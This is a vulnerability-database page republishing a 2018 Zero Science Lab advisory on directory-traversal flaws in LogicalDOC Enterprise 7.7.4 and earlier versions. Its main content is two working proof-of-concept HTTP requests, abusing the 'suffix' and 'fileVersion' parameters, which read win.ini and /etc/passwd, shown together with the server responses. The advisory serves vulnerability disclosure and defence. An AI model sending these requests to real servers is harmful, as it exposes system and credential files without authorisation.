Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LogicalDOC Enterprise 7.7.4 Directory Traversal

🗓️ 12 Feb 2018 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

LogicalDOC 7.7.4 Multiple Directory Traversal Vulnerabilitie

Code
`  
LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities  
  
  
Vendor: LogicalDOC Srl  
Product web page: https://www.logicaldoc.com  
Affected version: 7.7.4  
7.7.3  
7.7.2  
7.7.1  
7.6.4  
7.6.2  
7.5.1  
7.4.2  
7.1.1  
  
Summary: LogicalDOC is a free document management system that is designed  
to handle and share documents within an organization. LogicalDOC is a content  
repository, with Lucene indexing, Activiti workflow, and a set of automatic  
import procedures.  
  
Desc: The application suffers from multiple post-auth file disclosure vulnerability  
when input passed thru the 'suffix' and 'fileVersion' parameters is not properly  
verified before being used to include files. This can be exploited to read arbitrary  
files from local resources with directory traversal attacks.  
  
Tested on: Microsoft Windows 10  
Linux Ubuntu 16.04  
Java 1.8.0_161  
Apache-Coyote/1.1  
Apache Tomcat/8.5.24  
Apache Tomcat/8.5.13  
Undisclosed 8.41  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2018-5450  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5450.php  
  
  
26.01.2018  
  
---  
  
  
PoC #1:  
  
GET /thumbnail?docId=3375114&random=1517220341243&suffix=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1  
Host: localhost:8080  
  
  
Response:  
  
; for 16-bit app support  
[fonts]  
[extensions]  
[mci extensions]  
[files]  
[Mail]  
MAPI=1  
[MCI Extensions.BAK]  
3g2=MPEGVideo  
3gp=MPEGVideo  
3gp2=MPEGVideo  
3gpp=MPEGVideo  
aac=MPEGVideo  
adt=MPEGVideo  
adts=MPEGVideo  
m2t=MPEGVideo  
m2ts=MPEGVideo  
m2v=MPEGVideo  
m4a=MPEGVideo  
m4v=MPEGVideo  
mod=MPEGVideo  
mov=MPEGVideo  
mp4=MPEGVideo  
mp4v=MPEGVideo  
mts=MPEGVideo  
ts=MPEGVideo  
tts=MPEGVideo  
  
  
  
PoC #2:  
  
GET /convertpdf?docId=2450&control=preview&fileVersion=../../../../../../etc/passwd HTTP/1.1  
Host: localhozt:8080  
  
  
Response:  
  
HTTP/1.1 200   
Cache-Control: must-revalidate, post-check=0,pre-check=0  
Expires: 0  
Content-Disposition: attachment; filename="=?UTF-8?B?MDkyMDEyMzEwNTVTUFQgMDA0LnBkZi5wZGY=?="  
Pragma: public  
Content-Type: application/pdf;charset=UTF-8  
Content-Length: 964  
Date: Mon, 05 Feb 2018 21:30:59 GMT  
Connection: close  
  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:100:sync:/bin:/bin/sync  
games:x:5:100:games:/usr/games:/bin/sh  
...  
...  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Feb 2018 00:00Current
7.1High risk
Vulners AI Score7.1
logicaldocenterprisedirectory traversalvulnerabilitiesfile disclosuregjoko krsticwindows 10linux ubuntujavaapache tomcatzsl-2018-5450
24